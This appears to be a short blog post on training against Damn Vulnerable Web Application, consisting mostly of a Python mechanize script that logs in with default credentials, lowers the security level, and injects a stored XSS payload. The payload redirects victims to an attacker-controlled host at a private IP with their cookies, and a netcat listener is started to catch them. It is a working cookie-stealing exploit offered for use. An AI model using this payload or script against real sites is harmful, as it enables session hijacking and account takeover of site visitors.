Stored Cross-site Scripting (XSS) Cookie Stealing with Mechanize and DVWA

Damn Vulnerable Web Application (DVWA) is an intentionally vulnerable web application used for training. DVWA is also one of the web applications on the OWASP Broken Web Applications Virtual Machine. This post is nothing more than a script that automates the exploitation of the stored cross site scripting vulnerability using Python’s mechanize module for browser automation. The script injects a cookie-stealing payload into a vulnerable form, and sets up a listener to catch the cookie when a victim visits the page.

#Tested on Windows against DVWA within the OWASP Broken Web App VM Version 1.2

import mechanize
import sys
import os

uname = "admin"
pword = "admin"
rhost = sys.argv[1]
br = mechanize.Browser()

def loginAndReset(username,password):
    """Logs into DVWA and sets security to low"""
    br.open("http://" + rhost + "/dvwa/login.php") 
    br.select_form(nr=0) 
    br.form['username']= username 
    br.form['password']= password 
    br.submit() #submit the form
 
    br.follow_link(url_regex=r'security.php')
    br.select_form(nr=0) #selects the form
    br.form['security'] = ["low"] 
    br.submit()
 
def storedXss():
    """Injects the xss payload into the form"""
    br.open("http://" + rhost + "/dvwa/vulnerabilities/xss_s")
    br.select_form(nr=0)
    br.form['txtName']= "Jake"
    br.form['mtxMessage']= "Really cool stuff! Keep up the good work!<script>document.location='http://192.168.0.3:4444/cgi-bin/grab.cgi?'+document.cookie;</script>"
    br.submit()
 
def listener():
    """Starts a listener to catch the cookie"""
    os.system(r'start cmd.exe /k "nc -nlvp 4444"')
 
 
def main():
    loginAndReset(uname, pword)
    storedXss()
    listener()
 
if __name__ == '__main__':
    main()

Leave a Reply

Your email address will not be published. Required fields are marked *